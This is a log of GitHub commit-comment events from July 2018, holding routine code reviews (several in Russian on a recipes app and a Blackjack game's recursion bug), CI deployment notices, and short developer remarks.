{"id":"7924738652","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29610587,"position":null,"line":null,"path":null,"commit_id":"1d3d63b7c4b2b4ceb8567f5f209e9f7cfcd0c586","created_at":"2018-07-05T18:02:45Z","updated_at":"2018-07-05T18:02:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-406](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-406).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-406-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T18:02:45Z"}
{"id":"7924739302","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610592,"position":143,"line":143,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:02:54Z","updated_at":"2018-07-05T18:02:54Z","author_association":"NONE","body":"Вот эта `? true : false` очень лишняя вещь. Ты бы мог просто без этого написать"}},"created_at":"2018-07-05T18:02:54Z"}
{"id":"7924742404","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29610604,"position":null,"line":null,"path":null,"commit_id":"c8ccd028a78d154c3b82138f7827aec0e2de13dd","created_at":"2018-07-05T18:03:34Z","updated_at":"2018-07-05T18:03:34Z","author_association":"CONTRIBUTOR","body":"Good. Thanks!"}},"created_at":"2018-07-05T18:03:34Z"}
{"id":"7924743429","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610605,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T18:03:47Z","updated_at":"2018-07-05T18:03:47Z","author_association":"NONE","body":"а вот это еще интересней\r\n```\r\nYour cards:\r\n3♧\r\n7♧\r\nK♦\r\nYour points: 20\r\nDealer cards:\r\nJ♥\r\nQ♧\r\n2♧\r\nDealer points: 22\r\nYou lose\r\n```\r\nпочему я проиграл, если у дилера перебор ?"}},"created_at":"2018-07-05T18:03:47Z"}
{"id":"7924745364","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610607,"position":3,"line":3,"path":"components/AddRecipeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:04:13Z","updated_at":"2018-07-05T18:04:13Z","author_association":"NONE","body":"Удаляй импорты, которыми не пользуешься. В этом случае у тебя это StyleSheet и View."}},"created_at":"2018-07-05T18:04:13Z"}
{"id":"7924746330","type":"CommitCommentEvent","actor":{"login":"AndreyKudryavtsev"},"repo":{"name":"Seanistolen/fiovisualizer"},"payload":{"comment":{"id":29610610,"position":null,"line":null,"path":null,"commit_id":"fe527f370074320fc5d6eecd6cfbf3fbaf17400a","created_at":"2018-07-05T18:04:25Z","updated_at":"2018-07-05T18:04:25Z","author_association":"NONE","body":"Sorry, there is no one posted here. FIO Visualizer can't display latency percentile. If you need one, just take a QoS config \r\nhttps://github.com/intel/fiovisualizer/blob/master/Workloads/Device/NVMe_04k_RR_QD1_1J.ini\r\n\r\nand run it in FIO command line.  "}},"created_at":"2018-07-05T18:04:25Z"}
{"id":"7924746988","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610612,"position":14,"line":14,"path":"components/HomeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:04:34Z","updated_at":"2018-07-05T18:04:34Z","author_association":"NONE","body":"Удаляй импорты, которыми не пользуешься."}},"created_at":"2018-07-05T18:04:34Z"}
{"id":"7924748688","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610614,"position":223,"line":223,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:04:56Z","updated_at":"2018-07-05T18:04:56Z","author_association":"NONE","body":"Need exception"}},"created_at":"2018-07-05T18:04:56Z"}
{"id":"7924751349","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610623,"position":46,"line":46,"path":"components/HomeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:05:31Z","updated_at":"2018-07-05T18:05:31Z","author_association":"NONE","body":"renderItem должен быть private."}},"created_at":"2018-07-05T18:05:31Z"}
{"id":"7924761053","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610640,"position":124,"line":124,"path":"components/HomeScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:07:34Z","updated_at":"2018-07-05T18:07:34Z","author_association":"NONE","body":"`this.setState(prevState => ({ modalVisible: prevState.modalVisible }))`\r\n\r\nsetState – асинхронный, если внутри setState используешь state, используй функцию."}},"created_at":"2018-07-05T18:07:34Z"}
{"id":"7924763200","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"KiLEdEnNis/derogam"},"payload":{"comment":{"id":29610644,"position":null,"line":null,"path":null,"commit_id":"55178198a554ec790ce09e6010027e08ce63af3d","created_at":"2018-07-05T18:08:04Z","updated_at":"2018-07-05T18:08:04Z","author_association":"OWNER","body":"@Darcman99"}},"created_at":"2018-07-05T18:08:04Z"}
{"id":"7924763727","type":"CommitCommentEvent","actor":{"login":"legnaleurc"},"repo":{"name":"adsbypasser/adsbypasser"},"payload":{"comment":{"id":29610645,"position":null,"line":null,"path":null,"commit_id":"a795d036ae878ba7abfcfb301761e7c4aa639cf6","created_at":"2018-07-05T18:08:11Z","updated_at":"2018-07-05T18:08:11Z","author_association":"MEMBER","body":"This branch at this point did not know what was fixed in `master`.\r\nJust update this in the `master` branch.\r\nThis is why I made a placeholder commit in both branches."}},"created_at":"2018-07-05T18:08:11Z"}
{"id":"7924763858","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/Deep-Dream"},"payload":{"comment":{"id":29610646,"position":null,"line":null,"path":null,"commit_id":"0c7b94313850277e01ae58ea67c29a90159ba619","created_at":"2018-07-05T18:08:12Z","updated_at":"2018-07-05T18:08:12Z","author_association":"OWNER","body":"\"I wonder what could possibly go wrong if I committed an unfinished source file to the master branch . . .\""}},"created_at":"2018-07-05T18:08:12Z"}
{"id":"7924764673","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610647,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T18:08:22Z","updated_at":"2018-07-05T18:08:22Z","author_association":"NONE","body":"и далее\r\n```\r\nYour cards:\r\n2♦\r\n10♦\r\n3♤\r\nYour points: 15\r\nDealer cards:\r\n9♧\r\n7♤\r\n4♧\r\nDealer points: 20\r\nYou lose\r\nDo you want to continue? y/n\r\ny\r\nYour cards:\r\nTraceback (most recent call last):\r\n\t91: from game.rb:22:in `<main>'\r\n\t90: from .../my_game.rb:19:in `run'\r\n\t89: from .../my_game.rb:38:in `user_turn'\r\n\t88: from .../my_game.rb:77:in `open_cards'\r\n\t87: from .../results.rb:16:in `results'\r\n\t86: from .../winner.rb:29:in `continue'\r\n\t85: from .../my_game.rb:19:in `run'\r\n\t84: from .../my_game.rb:36:in `user_turn'\r\n\t83: from .../my_game.rb:44:in `skip'\r\n\t82: from .../my_game.rb:64:in `dealer_turn'\r\n\t81: from .../my_game.rb:46:in `skip'\r\n\t80: from .../my_game.rb:28:in `user_turn'\r\n\t79: from .../my_game.rb:51:in `full_hands'\r\n\t78: from .../my_game.rb:77:in `open_cards'\r\n\t77: from .../results.rb:16:in `results'\r\n\t76: from .../winner.rb:29:in `continue'\r\n\t75: from .../my_game.rb:19:in `run'\r\n\t74: from .../my_game.rb:36:in `user_turn'\r\n\t73: from .../my_game.rb:44:in `skip'\r\n\t72: from .../my_game.rb:64:in `dealer_turn'\r\n\t71: from .../my_game.rb:46:in `skip'\r\n\t70: from .../my_game.rb:28:in `user_turn'\r\n\t69: from .../my_game.rb:51:in `full_hands'\r\n\t68: from .../my_game.rb:77:in `open_cards'\r\n\t67: from .../results.rb:16:in `results'\r\n\t66: from .../winner.rb:29:in `continue'\r\n\t65: from .../my_game.rb:19:in `run'\r\n\t64: from .../my_game.rb:36:in `user_turn'\r\n\t63: from .../my_game.rb:44:in `skip'\r\n\t62: from .../my_game.rb:64:in `dealer_turn'\r\n\t61: from .../my_game.rb:46:in `skip'\r\n\t60: from .../my_game.rb:28:in `user_turn'\r\n\t59: from .../my_game.rb:51:in `full_hands'\r\n\t58: from .../my_game.rb:77:in `open_cards'\r\n\t57: from .../results.rb:16:in `results'\r\n\t56: from .../winner.rb:29:in `continue'\r\n\t55: from .../my_game.rb:19:in `run'\r\n\t54: from .../my_game.rb:36:in `user_turn'\r\n\t53: from .../my_game.rb:44:in `skip'\r\n\t52: from .../my_game.rb:64:in `dealer_turn'\r\n\t51: from .../my_game.rb:46:in `skip'\r\n\t50: from .../my_game.rb:28:in `user_turn'\r\n\t49: from .../my_game.rb:51:in `full_hands'\r\n\t48: from .../my_game.rb:77:in `open_cards'\r\n\t47: from .../results.rb:16:in `results'\r\n\t46: from .../winner.rb:29:in `continue'\r\n\t45: from .../my_game.rb:19:in `run'\r\n\t44: from .../my_game.rb:36:in `user_turn'\r\n\t43: from .../my_game.rb:44:in `skip'\r\n\t42: from .../my_game.rb:64:in `dealer_turn'\r\n\t41: from .../my_game.rb:46:in `skip'\r\n\t40: from .../my_game.rb:28:in `user_turn'\r\n\t39: from .../my_game.rb:51:in `full_hands'\r\n\t38: from .../my_game.rb:77:in `open_cards'\r\n\t37: from .../results.rb:16:in `results'\r\n\t36: from .../winner.rb:29:in `continue'\r\n\t35: from .../my_game.rb:19:in `run'\r\n\t34: from .../my_game.rb:36:in `user_turn'\r\n\t33: from .../my_game.rb:44:in `skip'\r\n\t32: from .../my_game.rb:64:in `dealer_turn'\r\n\t31: from .../my_game.rb:46:in `skip'\r\n\t30: from .../my_game.rb:28:in `user_turn'\r\n\t29: from .../my_game.rb:51:in `full_hands'\r\n\t28: from .../my_game.rb:77:in `open_cards'\r\n\t27: from .../results.rb:16:in `results'\r\n\t26: from .../winner.rb:29:in `continue'\r\n\t25: from .../my_game.rb:19:in `run'\r\n\t24: from .../my_game.rb:36:in `user_turn'\r\n\t23: from .../my_game.rb:44:in `skip'\r\n\t22: from .../my_game.rb:64:in `dealer_turn'\r\n\t21: from .../my_game.rb:46:in `skip'\r\n\t20: from .../my_game.rb:28:in `user_turn'\r\n\t19: from .../my_game.rb:51:in `full_hands'\r\n\t18: from .../my_game.rb:77:in `open_cards'\r\n\t17: from .../results.rb:16:in `results'\r\n\t16: from .../winner.rb:29:in `continue'\r\n\t15: from .../my_game.rb:19:in `run'\r\n\t14: from .../my_game.rb:36:in `user_turn'\r\n\t13: from .../my_game.rb:44:in `skip'\r\n\t12: from .../my_game.rb:64:in `dealer_turn'\r\n\t11: from .../my_game.rb:46:in `skip'\r\n\t10: from .../my_game.rb:28:in `user_turn'\r\n\t 9: from .../my_game.rb:51:in `full_hands'\r\n\t 8: from .../my_game.rb:77:in `open_cards'\r\n\t 7: from .../results.rb:16:in `results'\r\n\t 6: from .../winner.rb:29:in `continue'\r\n\t 5: from .../my_game.rb:17:in `run'\r\n\t 4: from .../my_game.rb:23:in `cards'\r\n\t 3: from .../my_game.rb:81:in `user_cards'\r\n\t 2: from .../ui.rb:25:in `user_cards_message'\r\n\t 1: from .../ui.rb:25:in `each'\r\n.../ui.rb:26:in `block in user_cards_message': undefined method `face' for nil:NilClass (NoMethodError)\r\n```\r\nво-первых программа вылетела\r\nво-вторых  такого длинного трейса быть не должно при правильной структуре программы...\r\nэтот трейс означает рекурсивные вызовы прогрммы самой себя и потенциальный риск переполнения памяти"}},"created_at":"2018-07-05T18:08:22Z"}
{"id":"7924767146","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aisultankassenov/recipes"},"payload":{"comment":{"id":29610661,"position":29,"line":29,"path":"components/InfoScreen.tsx","commit_id":"2ec7391c898bbb8c5bf391d0c1df35fd384899dc","created_at":"2018-07-05T18:08:53Z","updated_at":"2018-07-05T18:08:53Z","author_association":"NONE","body":"почему бы item не назвать instruction или что нибудь вроде того? названия типа data, item, info часто очень неясные"}},"created_at":"2018-07-05T18:08:53Z"}
{"id":"7924772724","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610680,"position":224,"line":224,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:10:08Z","updated_at":"2018-07-05T18:10:08Z","author_association":"NONE","body":"Log don't print, if this is unlikely or should not occur is this an error elsewhere in the script?"}},"created_at":"2018-07-05T18:10:08Z"}
{"id":"7924774904","type":"CommitCommentEvent","actor":{"login":"kmonika02"},"repo":{"name":"kmonika02/hello-world"},"payload":{"comment":{"id":29610690,"position":null,"line":null,"path":null,"commit_id":"ca9cb24e2f74f0a5a543920e629f34f996f1c857","created_at":"2018-07-05T18:10:35Z","updated_at":"2018-07-05T18:10:35Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-05T18:10:35Z"}
{"id":"7924775066","type":"CommitCommentEvent","actor":{"login":"SteveTroy-SalesForce"},"repo":{"name":"SteveTroy-SalesForce/best-repo-ever"},"payload":{"comment":{"id":29610691,"position":null,"line":null,"path":null,"commit_id":"98a6e7dee3d95c66027ee7b5042cf5b20313cd44","created_at":"2018-07-05T18:10:37Z","updated_at":"2018-07-05T18:10:37Z","author_association":"OWNER","body":"Alot of extra crap that should be gone"}},"created_at":"2018-07-05T18:10:37Z"}
{"id":"7924778610","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610701,"position":null,"line":null,"path":null,"commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T18:11:23Z","updated_at":"2018-07-05T18:11:23Z","author_association":"NONE","body":"знаешь что означает эта череда вложенных друг в друга методов?\r\nвот эта цепочка из `continue`, `run`, `user_turn` и т.д. которая повторяется много раз\r\nэто означает, что в памяти вызовы методов вкладывались друг в друга, как матрешки, и все предыдущие вызовы не \"уходили в небытие\" вместе со своим контекстом (переменными), как должно было быть, а висели и ждали завершения...\r\nэто рекурсия, которая может приводить к  Stack Overflow (переполнению стека памяти)\r\n\r\nнапишем к примеру такой класс, с вызовом метода `start` из метода `check`, который ранее был вызван в методе `start`\r\n\r\n```ruby\r\nclass A\r\n  def start\r\n    puts 'enter value'\r\n    value = gets.to_i\r\n    check(value)\r\n    puts value\r\n    puts 'start end'\r\n  end\r\n\r\n  def check(value)\r\n    puts 'check'\r\n    start unless value == 0\r\n    puts 'check end'\r\n  end\r\nend\r\n```\r\nдалее запустим программу в irb:\r\n```\r\nirb -r ./test.rb\r\n2.5.0 :001 > a = A.new\r\n => #<A:0x0000000000e1be00>\r\n2.5.0 :002 > a.start\r\nenter value\r\n1\r\ncheck\r\nenter value\r\n2\r\ncheck\r\nenter value\r\n3\r\ncheck\r\nenter value\r\n```\r\nвидно, что мы не разу не закочили выполнение ни одоного из методов\r\nт.е. программа только вызывает методы, \"входит\" внутрь, но не завершает их\r\nвсе эти вызовы висят в памяти со всеми переменными\r\nэто так называемый \"рекурсивный вызов\"\r\nтеперь введем `0`\r\nполностью картина работы программы будет выглядеть после этого вот так:\r\n```\r\nirb -r ./test.rb\r\n2.5.0 :001 > a = A.new\r\n => #<A:0x0000000000e1be00>\r\n2.5.0 :002 > a.start\r\nenter value\r\n1\r\ncheck\r\nenter value\r\n2\r\ncheck\r\nenter value\r\n3\r\ncheck\r\nenter value\r\n0\r\ncheck\r\ncheck end\r\n0\r\nstart end\r\ncheck end\r\n3\r\nstart end\r\ncheck end\r\n2\r\nstart end\r\ncheck end\r\n1\r\nstart end\r\n => nil\r\n2.5.0 :003 >\r\n```\r\nпосле ввода `0` у нас завершается выполнение всех вызванных и не завершенных ранее методов\r\nвидно, что в памяти хранились все значения переменной `value`\r\nесли методы более сложные, методов больше, переменных больше... то вот тут и получается вылет из программы из-за \"переполнения стека\"\r\n\r\nдругой вариант, вызовем метод из него самого:\r\n```ruby\r\nclass B\r\n  def start\r\n    puts 'enter value'\r\n    value = gets.to_i\r\n    start unless check?(value)\r\n    puts value\r\n    puts 'start end'\r\n  end\r\n\r\n  def check?(value)\r\n    puts 'check'\r\n    result = value == 0\r\n    puts 'check end'\r\n    result\r\n  end\r\nend\r\n\r\n```\r\nрезультат:\r\n```\r\nirb -r ./test.rb\r\n2.5.0 :001 > b = B.new\r\n => #<B:0x0000000000d37318>\r\n2.5.0 :002 > b.start\r\nenter value\r\n1\r\ncheck\r\ncheck end\r\nenter value\r\n2\r\ncheck\r\ncheck end\r\nenter value\r\n3\r\ncheck\r\ncheck end\r\nenter value\r\n0\r\ncheck\r\ncheck end\r\n0\r\nstart end\r\n3\r\nstart end\r\n2\r\nstart end\r\n1\r\nstart end\r\n => nil\r\n2.5.0 :003 >\r\n```\r\nздесь вложенность получается только на уровне метода `start`, метод `check` каждый раз успешно завершается\r\n\r\nпопробуем решить задачу без вызова метода самим себя, например через петлю `while`:\r\n```ruby\r\nclass C\r\n  def start\r\n    value = 1\r\n    while check?(value)\r\n      puts 'enter value'\r\n      value = gets.to_i\r\n      puts value\r\n      puts 'while end'\r\n    end\r\n    puts 'start end'\r\n  end\r\n\r\n  def check?(value)\r\n    puts 'check'\r\n    result = value != 0\r\n    puts 'check end'\r\n    result\r\n  end\r\nend\r\n```\r\n\r\nполучаем:\r\n```\r\nirb -r ./test.rb\r\n2.5.0 :001 > c = C.new\r\n => #<C:0x00000000023bee38>\r\n2.5.0 :002 > c.start\r\ncheck\r\ncheck end\r\nenter value\r\n1\r\n1\r\nwhile end\r\ncheck\r\ncheck end\r\nenter value\r\n2\r\n2\r\nwhile end\r\ncheck\r\ncheck end\r\nenter value\r\n3\r\n3\r\nwhile end\r\ncheck\r\ncheck end\r\nenter value\r\n0\r\n0\r\nwhile end\r\ncheck\r\ncheck end\r\nstart end\r\n => nil\r\n2.5.0 :003 >\r\n```\r\nкак видно рекурсивных вызовов нет, после ввода `0` все завершается, в памяти ничего не хранится, переменная `value` каждый раз обновляется"}},"created_at":"2018-07-05T18:11:23Z"}
{"id":"7924780778","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29610707,"position":null,"line":null,"path":null,"commit_id":"d7ac5474dd0582be35e2290d95f5fe610aee2963","created_at":"2018-07-05T18:11:51Z","updated_at":"2018-07-05T18:11:51Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/7/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/7//console)\n"}},"created_at":"2018-07-05T18:11:51Z"}
{"id":"7924783561","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610717,"position":227,"line":227,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:12:28Z","updated_at":"2018-07-05T18:12:28Z","author_association":"NONE","body":"The correct way to convert string to float is df['amount'] = float(df['amount']) assuming the previous value is a valid number string"}},"created_at":"2018-07-05T18:12:28Z"}
{"id":"7924785820","type":"CommitCommentEvent","actor":{"login":"zhaotao1987"},"repo":{"name":"zhaotao1987/SynNet-Pipeline"},"payload":{"comment":{"id":29610721,"position":null,"line":null,"path":null,"commit_id":"911a65f2ceb9ef74e1e8c8d120ad5a0716e04608","created_at":"2018-07-05T18:12:58Z","updated_at":"2018-07-05T18:12:58Z","author_association":"OWNER","body":"Build Phylogenomic Synteny Network"}},"created_at":"2018-07-05T18:12:58Z"}
{"id":"7924786440","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610723,"position":233,"line":233,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:13:06Z","updated_at":"2018-07-05T18:13:06Z","author_association":"NONE","body":"These additional info items are suitable for debug log level"}},"created_at":"2018-07-05T18:13:06Z"}
{"id":"7924787182","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610726,"position":231,"line":231,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:13:16Z","updated_at":"2018-07-05T18:13:16Z","author_association":"NONE","body":"Warning not debug"}},"created_at":"2018-07-05T18:13:16Z"}
{"id":"7924789480","type":"CommitCommentEvent","actor":{"login":"Baschdl"},"repo":{"name":"Baschdl/node2vec-c"},"payload":{"comment":{"id":29610732,"position":null,"line":null,"path":null,"commit_id":"67868d9b519230ec64190e4314a49c494a0fd462","created_at":"2018-07-05T18:13:48Z","updated_at":"2018-07-05T18:13:48Z","author_association":"OWNER","body":"Sure"}},"created_at":"2018-07-05T18:13:48Z"}
{"id":"7924791100","type":"CommitCommentEvent","actor":{"login":"snowyfox"},"repo":{"name":"kubernetes/charts"},"payload":{"comment":{"id":29610738,"position":null,"line":null,"path":null,"commit_id":"0897e3ee5c67792c77d069f2a43acc0287b5caa0","created_at":"2018-07-05T18:14:11Z","updated_at":"2018-07-05T18:14:11Z","author_association":"NONE","body":"This breaks existing deployments that didn't manually set service.clusterIP. It causes the deployment to fail with:\r\nError: UPGRADE FAILED: Service \"deployment-rabbitmq-ha\" is invalid: spec.clusterIP: Invalid value: \"None\": field is immutable"}},"created_at":"2018-07-05T18:14:11Z"}
{"id":"7924791862","type":"CommitCommentEvent","actor":{"login":"V-ed"},"repo":{"name":"Vhoyon/Discord-Bot"},"payload":{"comment":{"id":29610739,"position":null,"line":null,"path":null,"commit_id":"56c0db63675a0a2191c6a427a6e4eefeda6c0f49","created_at":"2018-07-05T18:14:20Z","updated_at":"2018-07-05T18:14:20Z","author_association":"COLLABORATOR","body":"Woops - forgot a smart commit here : #88"}},"created_at":"2018-07-05T18:14:20Z"}
{"id":"7924794504","type":"CommitCommentEvent","actor":{"login":"araujochavesjr"},"repo":{"name":"araujochavesjr/computational_linguistics_2018.1_exercises"},"payload":{"comment":{"id":29610747,"position":2,"line":1,"path":"exercicio-1/Teoria","commit_id":"3eb136c159aa6ea70694fda1c31617fd54c7bd55","created_at":"2018-07-05T18:14:56Z","updated_at":"2018-07-05T18:14:56Z","author_association":"OWNER","body":"E Katiuscia de Morais"}},"created_at":"2018-07-05T18:14:56Z"}
{"id":"7924796277","type":"CommitCommentEvent","actor":{"login":"gabrielredrado"},"repo":{"name":"gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744"},"payload":{"comment":{"id":29610755,"position":null,"line":null,"path":null,"commit_id":"6cfad73b1af3bb8fa26e90e3f8c8544793e39675","created_at":"2018-07-05T18:15:18Z","updated_at":"2018-07-05T18:15:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8dc3e052-1319-416f-8f2b-7358155ac08c?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180705013744744\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/37fda7be-6e5c-4e4a-811b-6f111e6bda43?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180705013744744\") deployed [sample-cloud-native-toolchain-tutorial-20180705013744744](https://github.com/gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744/releases/tag/deploy-ibm-yp-us-south-redrado-ar.ibm.com-test-20180705-181518 \"deploy-ibm-yp-us-south-redrado-ar.ibm.com-test-20180705-181518\") to [test](https://console.bluemix.net/apps/ed25903e-1a14-40a6-8d89-2a8cff39b5e9?env_id=ibm:yp:us-south \"ibm:yp:us-south:redrado@ar.ibm.com:test\"), including this commit"}},"created_at":"2018-07-05T18:15:18Z"}
{"id":"7924797522","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29610759,"position":8,"line":8,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T18:15:34Z","updated_at":"2018-07-05T18:15:34Z","author_association":"NONE","body":"да, верно\r\nк станции аттрибут ТИП отношения не имеет\r\nв задании идет речь про аттрибут класса Трейн\r\nздесь его надо убирать"}},"created_at":"2018-07-05T18:15:34Z"}
{"id":"7924799820","type":"CommitCommentEvent","actor":{"login":"thomaspark"},"repo":{"name":"thomaspark/bootswatch"},"payload":{"comment":{"id":29610767,"position":null,"line":null,"path":null,"commit_id":"516548edc83838830b9015126b24cda47ed9dbac","created_at":"2018-07-05T18:16:04Z","updated_at":"2018-07-05T18:16:04Z","author_association":"OWNER","body":"@XhmikosR, sorry for the spam. Trying to set up https on GitHub, but getting this message with the Enforce HTTPS option grayed out:\r\n\r\n<img width=\"761\" alt=\"screen shot 2018-07-05 at 1 58 26 pm\" src=\"https://user-images.githubusercontent.com/900407/42339663-a61b0726-805b-11e8-97c2-669b8366ec05.png\">\r\n\r\nTried toggling the custom domain like the docs suggest which caused these changes, but not working yet.\r\n\r\n> After updating any A record IP addresses, you must remove and re-add your custom domain to the repository you’re using to publish your Pages site to trigger the process of enabling HTTPS.\r\n"}},"created_at":"2018-07-05T18:16:04Z"}
{"id":"7924801388","type":"CommitCommentEvent","actor":{"login":"JeremyDJialiang"},"repo":{"name":"JeremyDJialiang/happymall_learning"},"payload":{"comment":{"id":29610771,"position":14,"line":20,"path":"src/main/resources/applicationContext-datasource.xml","commit_id":"08e6d01adde9da943aea915b1ad9debba90d6525","created_at":"2018-07-05T18:16:24Z","updated_at":"2018-07-05T18:16:24Z","author_association":"OWNER","body":"sss"}},"created_at":"2018-07-05T18:16:24Z"}
{"id":"7924805715","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"thomaspark/bootswatch"},"payload":{"comment":{"id":29610779,"position":null,"line":null,"path":null,"commit_id":"516548edc83838830b9015126b24cda47ed9dbac","created_at":"2018-07-05T18:17:22Z","updated_at":"2018-07-05T18:17:22Z","author_association":"CONTRIBUTOR","body":"Don't you use Cloudflare @thomaspark? If so, just ignore this and set the SSL to Flexible on Cloudflare."}},"created_at":"2018-07-05T18:17:22Z"}
{"id":"7924805934","type":"CommitCommentEvent","actor":{"login":"V-ed"},"repo":{"name":"Vhoyon/Discord-Bot"},"payload":{"comment":{"id":29610780,"position":null,"line":null,"path":null,"commit_id":"8506f9d34175fe97994168485f9281d64caabd2c","created_at":"2018-07-05T18:17:25Z","updated_at":"2018-07-05T18:17:25Z","author_association":"COLLABORATOR","body":"Woops - forgot a smart commit here : #88"}},"created_at":"2018-07-05T18:17:25Z"}
{"id":"7924816213","type":"CommitCommentEvent","actor":{"login":"gabrielredrado"},"repo":{"name":"gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744"},"payload":{"comment":{"id":29610817,"position":null,"line":null,"path":null,"commit_id":"6cfad73b1af3bb8fa26e90e3f8c8544793e39675","created_at":"2018-07-05T18:19:42Z","updated_at":"2018-07-05T18:19:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8dc3e052-1319-416f-8f2b-7358155ac08c?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180705013744744\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/37fda7be-6e5c-4e4a-811b-6f111e6bda43?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180705013744744\") deployed [sample-cloud-native-toolchain-tutorial-20180705013744744](https://github.com/gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744/releases/tag/deploy-ibm-yp-us-south-redrado-ar.ibm.com-prod-20180705-181941 \"deploy-ibm-yp-us-south-redrado-ar.ibm.com-prod-20180705-181941\") to [prod](https://console.bluemix.net/apps/def8f054-74c4-4354-a638-53ca3aff5960?env_id=ibm:yp:us-south \"ibm:yp:us-south:redrado@ar.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-05T18:19:42Z"}
